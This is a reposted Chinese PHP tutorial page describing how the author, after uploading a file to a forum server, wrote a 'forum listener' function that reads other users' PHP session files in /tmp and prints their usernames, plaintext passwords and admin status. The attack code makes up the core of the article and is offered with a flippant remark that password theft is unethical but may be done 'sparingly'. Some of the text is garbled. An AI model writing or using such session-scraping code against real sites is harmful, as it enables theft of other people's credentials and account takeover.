微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 后端开发 > php教程 > 正文

一个查看session内容的函数:_PHP教程

php中文网
发布: 2016-07-20 11:05:12
原创
960人浏览过

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:

function submit1(){
global $username;
print "

论坛监听器";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
    return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."
使用密码:".$passwd[2]."
使用模式:";
if($mode[1]==1)
print "管理员";
else
print "一般用户";
print"

偷窃他人密码是不道德行为请少少为之
";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,请再来一次,不要多打空格!";
$d->close();
}
function login(){
?>


论坛监听器




璁哄

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

文心一言 1008
查看详情 文心一言
相关标签:
session

大家都在看:

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:1. 引子_PHP教程 下一篇:PHP网页的编码问题_PHP教程
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
怎么用php签名_PHP数据签名(HMAC/SHA)生成与验证方法 使用HMAC-SHA256可实现PHP数据安全传输,通过hash_hmac生成签名、参数排序拼接、hash_equals验证防篡改,并可封装支持多算法。
2025-11-08 22:49:34
619
PHP如何实现类的继承_PHP使用extends关键字实现继承的方法 通过extends实现继承,子类复用父类非私有成员;可重写方法并用parent::调用父类版本;支持多层继承构建复杂体系。
2025-11-08 21:38:02
444
PHP三元运算符优化建议_PHP三元运算符使用优化建议 三元运算符应适度使用以提升代码可读性,避免深层嵌套,推荐用if-else或PHP8的match替代;优先采用??处理变量默认值,确保类型安全,避免短三元误判假值;复杂逻辑应封装函数,三元仅用于简单赋值,保持表达式简洁清晰。
2025-11-08 21:31:19
711
php代码代码异常处理怎么优化_php代码错误捕获与用户体验性能优化方法教程 答案:PHP异常处理需统一捕获未被捕获的异常和错误,通过set_exception_handler与set_error_handler实现全局管理,结合try-catch分层处理关键操作,自定义异常类区分错误类型,生产环境隐藏敏感信息并返回结构化错误,避免异常滥用以提升性能。
2025-11-08 21:21:03
916
PHP框架怎么管理配置文件_PHP框架多环境配置与动态参数管理 主流PHP框架通过环境标识实现多环境配置分离,利用.env文件加载对应变量;2.配置可按目录或条件区分开发、测试、生产环境,并支持数据库或Redis动态注入;3.框架提供配置缓存命令提升性能,生产环境需开启缓存以减少I/O开销;4.敏感信息应通过环境变量注入,结合配置服务类与事件机制确保安全与一致性。
2025-11-08 21:19:15
177
PHP邮件怎么SMTP配置_PHPSMTP邮件发送配置及常见问题。 使用SMTP可解决PHP邮件投递问题,推荐通过PHPMailer或SwiftMailer配置SMTP发送邮件,确保正确设置服务器参数、认证信息及端口,并检查防火墙、DNS与凭据以避免超时或认证失败。
2025-11-08 21:14:02
779
php网站用户会话管理怎么优化配置_php网站会话存储与并发访问性能优化教程 将PHP会话存储从文件切换至Redis可显著提升高并发下的读写性能;2.合理设置会话过期时间并禁用内置GC,利用Redis的TTL机制自动清理;3.通过OPcache和Memcached/APCu缓存会话关键数据,减少I/O开销;4.使用session_write_close()释放会话锁,避免请求阻塞;5.当单一Redis成为瓶颈时,采用哈希分片将会话分布到多个节点,结合连接池优化访问效率。
2025-11-08 21:12:02
640
php短信接口怎么用_PHP短信API接口调用与实现方法教程 注册短信服务提供商并获取API密钥;2.通过Composer安装对应SDK;3.配置凭证并初始化客户端发送请求;4.处理响应与错误,确保安全与稳定性。
2025-11-08 21:09:02
113
为什么PHP代码无法正确解析JSON数据_PHP JSON数据解析问题排查与解决教程 首先验证JSON格式合法性,使用jsonlint校验并结合json_last_error检查错误;确保字符串为UTF-8编码,必要时用mb_convert_encoding转换;正确调用json_decode,注意参数设置与数据类型;处理特殊字符转义问题,避免引号或反斜杠异常;最后通过var_dump输出原始数据,确认输入完整无截断。
2025-11-08 20:58:02
919
如何配置linux下php环境_linux服务器php运行环境配置教程 首先安装Web服务器和PHP环境,CentOS使用yum安装Apache与PHP,Ubuntu则用apt安装Nginx与PHP-FPM,随后配置服务器解析PHP文件,创建测试页验证成功即完成部署。
2025-11-08 20:52:02
475
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部